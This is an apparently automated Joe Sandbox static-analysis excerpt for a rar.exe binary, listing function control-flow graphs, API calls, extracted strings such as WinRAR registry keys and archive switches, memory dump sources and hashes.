                                                                                                                                                                                                                                      • Opcode ID: 5ee4955b49511cc911fe8b469ecfb9a50c8a330afbc075bb0d0f7ed7f2ea3295
                                                                                                                                                                                                                                      • Instruction ID: 28811004f7c24c76426dfc1e0878d4cf549015a2967158e6b5346387b87362ba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ee4955b49511cc911fe8b469ecfb9a50c8a330afbc075bb0d0f7ed7f2ea3295
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F710032A0568186D754DF29E5052EC33D5FB88F98F144179CF9DCB399DF3AA0428790
                                                                                                                                                                                                                                      Function 00007FF69A423EA8 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 491COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 635 7ff69a423ea8-7ff69a423f03 call 7ff69a43a5a0 call 7ff69a43c8a0 640 7ff69a423f40-7ff69a423f50 call 7ff69a42a9e8 635->640 641 7ff69a423f05-7ff69a423f3e GetModuleFileNameW call 7ff69a414e14 call 7ff69a42a9c0 635->641 644 7ff69a423f55-7ff69a423f79 call 7ff69a401874 call 7ff69a401e80 640->644 641->644 652 7ff69a423f7f-7ff69a423f89 644->652 653 7ff69a424692-7ff69a4246c5 call 7ff69a4018ac call 7ff69a43a610 644->653 655 7ff69a423f8b-7ff69a423fac call 7ff69a4211c0 * 2 652->655 656 7ff69a423fae-7ff69a423feb call 7ff69a43ec70 * 2 652->656 655->656 668 7ff69a423fef-7ff69a423ff3 656->668 669 7ff69a423ff9-7ff69a42402d call 7ff69a402440 call 7ff69a402150 668->669 670 7ff69a4240f2-7ff69a424112 call 7ff69a4022e0 call 7ff69a43eb90 668->670 680 7ff69a4240bc-7ff69a4240e2 call 7ff69a4022e0 669->680 681 7ff69a424033 669->681 670->653 679 7ff69a424118-7ff69a424131 call 7ff69a402150 670->679 692 7ff69a424138-7ff69a42414b call 7ff69a43eb90 679->692 693 7ff69a424133-7ff69a424136 679->693 680->668 689 7ff69a4240e8-7ff69a4240ec 680->689 683 7ff69a42403a-7ff69a42403e 681->683 686 7ff69a424040-7ff69a424044 683->686 687 7ff69a424064-7ff69a424069 683->687 686->687 694 7ff69a424046-7ff69a42405e call 7ff69a442290 686->694 690 7ff69a424097-7ff69a42409f 687->690 691 7ff69a42406b-7ff69a424070 687->691 689->653 689->670 696 7ff69a4240b7 690->696 697 7ff69a4240a1 690->697 691->690 695 7ff69a424072-7ff69a424078 691->695 692->653 710 7ff69a424151-7ff69a42416c call 7ff69a42d54c call 7ff69a43eb88 692->710 698 7ff69a42416f-7ff69a4241b1 call 7ff69a42a900 call 7ff69a43eb90 693->698 706 7ff69a424060 694->706 707 7ff69a4240a3-7ff69a4240a7 694->707 702 7ff69a42407a-7ff69a424091 call 7ff69a441700 695->702 703 7ff69a424093 695->703 696->680 697->683 718 7ff69a4241c0-7ff69a4241d5 698->718 719 7ff69a4241b3-7ff69a4241bb call 7ff69a43eb88 698->719 702->703 715 7ff69a4240a9-7ff69a4240b5 702->715 703->690 706->687 707->696 710->698 715->680 722 7ff69a4241db 718->722 723 7ff69a4245f0-7ff69a424624 call 7ff69a423884 call 7ff69a43eb88 * 2 718->723 719->653 726 7ff69a4241e1-7ff69a4241ee 722->726 759 7ff69a424626-7ff69a424648 call 7ff69a4211c0 * 2 723->759 760 7ff69a42464a-7ff69a424691 call 7ff69a43ec70 * 2 723->760 728 7ff69a424508-7ff69a424513 726->728 729 7ff69a4241f4-7ff69a4241fa 726->729 728->723 731 7ff69a424519-7ff69a424523 728->731 732 7ff69a424208-7ff69a42420e 729->732 733 7ff69a4241fc-7ff69a424202 729->733 737 7ff69a424585-7ff69a424589 731->737 738 7ff69a424525-7ff69a42452b 731->738 734 7ff69a4243d0-7ff69a4243e0 call 7ff69a42a580 732->734 735 7ff69a424214-7ff69a42425c 732->735 733->728 733->732 755 7ff69a4243e6-7ff69a424414 call 7ff69a42a9e8 call 7ff69a44172c 734->755 756 7ff69a4244f0-7ff69a424503 734->756 739 7ff69a424261-7ff69a424264 735->739 741 7ff69a42458b-7ff69a42458f 737->741 742 7ff69a4245a3-7ff69a4245d4 call 7ff69a423884 737->742 744 7ff69a4245db-7ff69a4245de 738->744 745 7ff69a424531-7ff69a424539 738->745 747 7ff69a424268-7ff69a424270 739->747 741->742 749 7ff69a424591-7ff69a424597 741->749 742->744 744->723 746 7ff69a4245e0-7ff69a4245e5 744->746 752 7ff69a42453b-7ff69a42453e 745->752 753 7ff69a424573-7ff69a42457a 745->753 746->726 747->747 754 7ff69a424272-7ff69a424288 call 7ff69a441700 747->754 749->744 758 7ff69a424599-7ff69a4245a1 749->758 762 7ff69a42456a-7ff69a424571 752->762 763 7ff69a424540-7ff69a424543 752->763 757 7ff69a42457e-7ff69a424583 753->757 778 7ff69a42428a-7ff69a424295 754->778 779 7ff69a4242a3 754->779 755->756 787 7ff69a42441a-7ff69a4244a9 call 7ff69a42d840 call 7ff69a42a900 call 7ff69a42a8c4 call 7ff69a42a900 call 7ff69a4415fc 755->787 756->728 757->744 758->744 759->760 760->653 762->757 764 7ff69a424561-7ff69a424568 763->764 765 7ff69a424545-7ff69a424548 763->765 764->757 770 7ff69a424558-7ff69a42455f 765->770 771 7ff69a42454a-7ff69a42454d 765->771 770->757 771->749 776 7ff69a42454f-7ff69a424556 771->776 776->757 778->779 784 7ff69a424297-7ff69a4242a1 778->784 786 7ff69a4242a7-7ff69a4242be 779->786 784->786 786->739 788 7ff69a4242c0-7ff69a4242c2 786->788 821 7ff69a4244ab-7ff69a4244bb 787->821 822 7ff69a4244bf-7ff69a4244cf 787->822 790 7ff69a4242e6 788->790 791 7ff69a4242c4-7ff69a4242d6 call 7ff69a42a900 788->791 790->734 794 7ff69a4242ec 790->794 797 7ff69a4242db-7ff69a4242e1 791->797 795 7ff69a4242f1-7ff69a4242f7 794->795 798 7ff69a4242f9-7ff69a4242fe 795->798 799 7ff69a424300-7ff69a424303 795->799 801 7ff69a4245d6 797->801 798->799 802 7ff69a424305-7ff69a424314 798->802 799->795 801->744 804 7ff69a424316-7ff69a424320 802->804 805 7ff69a42433d-7ff69a424347 802->805 808 7ff69a424323-7ff69a424327 804->808 809 7ff69a4245ea-7ff69a4245ef call 7ff69a43a774 805->809 810 7ff69a42434d-7ff69a424378 call 7ff69a42d840 805->810 808->805 813 7ff69a424329-7ff69a42433b 808->813 809->723 819 7ff69a42437a-7ff69a424399 call 7ff69a441764 810->819 820 7ff69a42439e-7ff69a4243cb call 7ff69a42470c 810->820 813->805 813->808 819->797 820->797 821->822 826 7ff69a4244d2-7ff69a4244d8 822->826 828 7ff69a4244eb-7ff69a4244ee 826->828 829 7ff69a4244da-7ff69a4244e5 826->829 828->826 829->801 829->828
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileModuleNamesnprintfwcschr
                                                                                                                                                                                                                                      • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
                                                                                                                                                                                                                                      • API String ID: 602362809-1645646101
                                                                                                                                                                                                                                      • Opcode ID: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
                                                                                                                                                                                                                                      • Instruction ID: 5990c7d11fef7ab02c386d3cf469c29136af52dcf2eab67c3bff61f62d1c4877
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A622AD22A1869285EB30DF15D4402B973E1FF44B84F8151B6EE8ECB6D9EF6CE546C780
                                                                                                                                                                                                                                      Function 00007FF69A3F4FD0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 293COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1405 7ff69a3f4fd0-7ff69a3f502d call 7ff69a43a5a0 1408 7ff69a3f502f-7ff69a3f5037 1405->1408 1409 7ff69a3f504d-7ff69a3f5055 1405->1409 1408->1409 1410 7ff69a3f5039-7ff69a3f504b call 7ff69a43c8a0 1408->1410 1411 7ff69a3f506e-7ff69a3f5089 call 7ff69a41420c 1409->1411 1412 7ff69a3f5057-7ff69a3f5069 call 7ff69a3f481c 1409->1412 1410->1409 1410->1412 1418 7ff69a3f509f-7ff69a3f50b6 call 7ff69a42db08 1411->1418 1419 7ff69a3f508b-7ff69a3f509d call 7ff69a42a9c0 1411->1419 1412->1411 1424 7ff69a3f511b-7ff69a3f5131 call 7ff69a43c8a0 1418->1424 1425 7ff69a3f50b8-7ff69a3f50c3 call 7ff69a42a59c 1418->1425 1419->1424 1430 7ff69a3f5203-7ff69a3f520d call 7ff69a42aa48 1424->1430 1431 7ff69a3f5137-7ff69a3f513e 1424->1431 1425->1424 1432 7ff69a3f50c5-7ff69a3f50cf call 7ff69a403054 1425->1432 1440 7ff69a3f5212-7ff69a3f521c 1430->1440 1433 7ff69a3f5140-7ff69a3f5167 call 7ff69a413f98 1431->1433 1434 7ff69a3f516c-7ff69a3f51be call 7ff69a42aa1c call 7ff69a42aa48 call 7ff69a426e98 1431->1434 1432->1424 1441 7ff69a3f50d1-7ff69a3f5107 call 7ff69a42a9e8 call 7ff69a42a9c0 call 7ff69a403054 1432->1441 1433->1434 1490 7ff69a3f51d3-7ff69a3f51e8 call 7ff69a427a24 1434->1490 1443 7ff69a3f5222 1440->1443 1444 7ff69a3f52db-7ff69a3f52e0 1440->1444 1441->1424 1516 7ff69a3f5109-7ff69a3f5116 call 7ff69a42a9e8 1441->1516 1449 7ff69a3f532f-7ff69a3f5332 1443->1449 1450 7ff69a3f5228-7ff69a3f522d 1443->1450 1445 7ff69a3f5453-7ff69a3f5477 call 7ff69a3ff00c call 7ff69a3ff230 call 7ff69a3ff09c 1444->1445 1446 7ff69a3f52e6-7ff69a3f52e9 1444->1446 1509 7ff69a3f547c-7ff69a3f5483 1445->1509 1455 7ff69a3f52ef-7ff69a3f52f2 1446->1455 1456 7ff69a3f5379-7ff69a3f5382 1446->1456 1453 7ff69a3f5334 1449->1453 1454 7ff69a3f533b-7ff69a3f533e 1449->1454 1450->1449 1451 7ff69a3f5233-7ff69a3f5236 1450->1451 1459 7ff69a3f5290-7ff69a3f5299 1451->1459 1460 7ff69a3f5238-7ff69a3f523b 1451->1460 1453->1454 1464 7ff69a3f5340 1454->1464 1465 7ff69a3f5347-7ff69a3f5358 call 7ff69a3e1230 call 7ff69a3e4858 1454->1465 1466 7ff69a3f52f4-7ff69a3f52f7 1455->1466 1467 7ff69a3f536c-7ff69a3f5374 call 7ff69a4281cc 1455->1467 1462 7ff69a3f5388-7ff69a3f538b 1456->1462 1463 7ff69a3f5449-7ff69a3f5451 call 7ff69a41eab8 1456->1463 1480 7ff69a3f52b2-7ff69a3f52bd 1459->1480 1481 7ff69a3f529b-7ff69a3f529e 1459->1481 1471 7ff69a3f5274-7ff69a3f528b call 7ff69a3e1230 call 7ff69a3e48ec 1460->1471 1472 7ff69a3f523d-7ff69a3f5240 1460->1472 1476 7ff69a3f5391-7ff69a3f5397 1462->1476 1477 7ff69a3f541b-7ff69a3f5433 call 7ff69a42ab1c 1462->1477 1463->1509 1464->1465 1524 7ff69a3f535d 1465->1524 1466->1445 1479 7ff69a3f52fd-7ff69a3f5300 1466->1479 1467->1509 1541 7ff69a3f535e-7ff69a3f5362 call 7ff69a3e14fc 1471->1541 1472->1445 1484 7ff69a3f5246-7ff69a3f5249 1472->1484 1495 7ff69a3f540c-7ff69a3f5419 call 7ff69a4154f8 call 7ff69a4151e4 1476->1495 1496 7ff69a3f5399-7ff69a3f539c 1476->1496 1477->1509 1523 7ff69a3f5435-7ff69a3f5447 call 7ff69a41bbd4 1477->1523 1479->1449 1497 7ff69a3f5302-7ff69a3f5305 1479->1497 1489 7ff69a3f52ce-7ff69a3f52d6 call 7ff69a4155e0 1480->1489 1492 7ff69a3f52bf-7ff69a3f52c9 call 7ff69a42a9e8 1480->1492 1488 7ff69a3f52a0-7ff69a3f52a6 1481->1488 1481->1489 1484->1449 1501 7ff69a3f524f-7ff69a3f5252 1484->1501 1506 7ff69a3f5313-7ff69a3f531d call 7ff69a3f481c 1488->1506 1507 7ff69a3f52a8-7ff69a3f52ad call 7ff69a3f7214 1488->1507 1489->1509 1543 7ff69a3f51c0-7ff69a3f51ce call 7ff69a42aa48 1490->1543 1544 7ff69a3f51ea-7ff69a3f5201 call 7ff69a426f68 call 7ff69a3e14c0 1490->1544 1492->1489 1495->1509 1513 7ff69a3f539e-7ff69a3f53a1 1496->1513 1514 7ff69a3f53ef-7ff69a3f5401 call 7ff69a3f45c8 1496->1514 1498 7ff69a3f5322-7ff69a3f532a call 7ff69a4067e0 1497->1498 1499 7ff69a3f5307-7ff69a3f530a 1497->1499 1498->1509 1499->1445 1515 7ff69a3f5310 1499->1515 1501->1445 1518 7ff69a3f5258-7ff69a3f525b 1501->1518 1506->1509 1507->1509 1529 7ff69a3f5485-7ff69a3f548c call 7ff69a3f8444 1509->1529 1530 7ff69a3f5491-7ff69a3f54bc call 7ff69a43a610 1509->1530 1513->1506 1528 7ff69a3f53a7-7ff69a3f53d5 call 7ff69a3f45c8 call 7ff69a42ab1c 1513->1528 1514->1495 1515->1506 1516->1424 1534 7ff69a3f525d-7ff69a3f5260 1518->1534 1535 7ff69a3f526b-7ff69a3f5272 1518->1535 1523->1509 1524->1541 1528->1509 1560 7ff69a3f53db-7ff69a3f53ea call 7ff69a41ba9c 1528->1560 1529->1530 1534->1498 1548 7ff69a3f5266 1534->1548 1535->1489 1555 7ff69a3f5367 1541->1555 1543->1490 1544->1440 1548->1515 1555->1509 1560->1509
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcschr
                                                                                                                                                                                                                                      • String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
                                                                                                                                                                                                                                      • API String ID: 1497570035-1281034975
                                                                                                                                                                                                                                      • Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                                      • Instruction ID: 6dc8180074a1955519ca7710bdd54138f90f6955094ab4e08295e0f7963d5ac1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1C19361A2C58250FB75AF2598551FC32D1EF46B84F4441FEEE4ECAADADE2CE601D301
                                                                                                                                                                                                                                      Function 00007FF69A427F24 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1564 7ff69a427f24-7ff69a427f5c 1565 7ff69a427f5e-7ff69a427f64 1564->1565 1566 7ff69a427fd0 1564->1566 1565->1566 1568 7ff69a427f66-7ff69a427f7c call 7ff69a42b3f0 1565->1568 1567 7ff69a427fd7-7ff69a427fea 1566->1567 1569 7ff69a428036-7ff69a428039 1567->1569 1570 7ff69a427fec-7ff69a427fef 1567->1570 1578 7ff69a427f7e-7ff69a427fb3 GetProcAddressForCaller GetProcAddress 1568->1578 1579 7ff69a427fb5 1568->1579 1572 7ff69a42803b-7ff69a42804a 1569->1572 1573 7ff69a42805c-7ff69a428065 GetCurrentProcessId 1569->1573 1570->1573 1574 7ff69a427ff1-7ff69a428000 1570->1574 1584 7ff69a42804f-7ff69a428051 1572->1584 1576 7ff69a428077-7ff69a428093 1573->1576 1577 7ff69a428067 1573->1577 1585 7ff69a428005-7ff69a428007 1574->1585 1583 7ff69a428069-7ff69a428075 1577->1583 1580 7ff69a427fbc-7ff69a427fce 1578->1580 1579->1580 1580->1567 1583->1576 1583->1583 1584->1576 1586 7ff69a428053-7ff69a42805a 1584->1586 1585->1576 1587 7ff69a428009 1585->1587 1588 7ff69a428010-7ff69a428034 call 7ff69a3fca6c call 7ff69a3fcda4 call 7ff69a3fca40 1586->1588 1587->1588 1588->1576
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                                                                                                                                                                                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                                                                                      • API String ID: 1389829785-2207617598
                                                                                                                                                                                                                                      • Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                                      • Instruction ID: 22bd30b037593908c18f3d7135e97cae15ef47f611a4556eb1be25f5cd939693
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31416524A09A9280FA64CF1AA84097977E1FF49FD4F0A11F6CC2DC77A4DE7CE0428341
                                                                                                                                                                                                                                      Function 00007FF69A43B0FC Relevance: 13.6, APIs: 9, Instructions: 92COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 552178382-0
                                                                                                                                                                                                                                      • Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                                      • Instruction ID: 464917b92cd3a970cfefc1e03fd64ca2828e7ae16eef85b2f24cf0a715a8c3ed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46314E21E0828386FA74AB25A6193B933D1EF45F84F4450F4EA8DCB2D7DE6DE4068740
                                                                                                                                                                                                                                      Function 00007FF69A424774 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF69A42495D,?,?,?,00007FF69A417E7D), ref: 00007FF69A4247DB
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF69A42495D,?,?,?,00007FF69A417E7D), ref: 00007FF69A424831
                                                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF69A42495D,?,?,?,00007FF69A417E7D), ref: 00007FF69A424853
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF69A42495D,?,?,?,00007FF69A417E7D), ref: 00007FF69A4248A6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                                                                                                                                                                                                      • String ID: LanguageFolder$Software\WinRAR\General
                                                                                                                                                                                                                                      • API String ID: 1800380464-3408810217
                                                                                                                                                                                                                                      • Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                                      • Instruction ID: 56402b51eb64172d3fa15cbd6222296f70a7314075cebb24d812214a126e7ddf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8319226728A8145EB709F21E8002BA73D1FF85B94F4051B1EE5EC7B99EF6CD145CB00
                                                                                                                                                                                                                                      Function 00007FF69A414398 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
